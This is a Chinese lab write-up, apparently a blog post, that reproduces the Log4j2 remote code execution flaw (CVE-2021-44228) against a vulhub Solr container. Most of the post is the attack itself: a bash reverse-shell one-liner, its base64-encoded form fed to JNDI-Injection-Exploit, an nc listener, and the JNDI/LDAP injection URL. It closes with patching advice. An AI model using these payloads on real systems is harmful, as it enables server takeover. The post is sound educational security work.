Apache Log4j2 远程代码执行漏洞复现 (CVE-2021-44228)

引言

       Log4j是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。

实验环境

攻击机(Win10):172.20.10.2
受害机(Linux):172.20.10.10、vulhub

复现过程

vulhub 放入docker中,直接docker-compose up -d,一键启动环境。
在这里插入图片描述开始漏洞利用,首先我们构造反弹shell用到的命令:

bash -i >& /dev/tcp/反弹shell的主机ip/端口号 0>&1

这里是IP是:172.20.10.2,端口号:6666,反弹shell需要经过编码,所以我们对上面那段命令base64编码。
在这里插入图片描述
加密完毕后把结果复制下来,构造payload,应用工具JNDI-Injection-Exploit搭建服务:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjAuMTAuMi82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}" -A "172.20.10.2"

-C后面的参数是要执行的命令以及编码方式,-A后面就是对应ip地址
在这里插入图片描述可以看到有三个服务,实际上这个jar的作用就是帮我们生成了恶意代码类,并且生成了对应的url,然后我们就可以回到刚才的网站去进行JNDI注入:
在注入之前,使用nc进行端口监听

nc -lvvp 端口号

这里构造的端口号是6666
在这里插入图片描述然后回到solr页面,进行payload构造

http://172.20.10.10:8983/solr/admin/cores?action=${jndi:ldap://172.20.10.2:1389/twce0q}

直接访问:
在这里插入图片描述可以看到网页被重定向到了我们的恶意类地址:
在这里插入图片描述现在去nc上,查看是否反弹shell成功
在这里插入图片描述弹回来了,输入几个命令测试,大功告成。

修复建议

目前,Apache官方已发布新版本完成漏洞修复,建议及时升级至最新版本:

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

建议同时采用如下临时措施进行漏洞防范:

1.JDK使用11.0.1、8u191、7u201、6u211及以上的高版本;

2.部署使用第三方防火墙产品进行安全防护。

  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值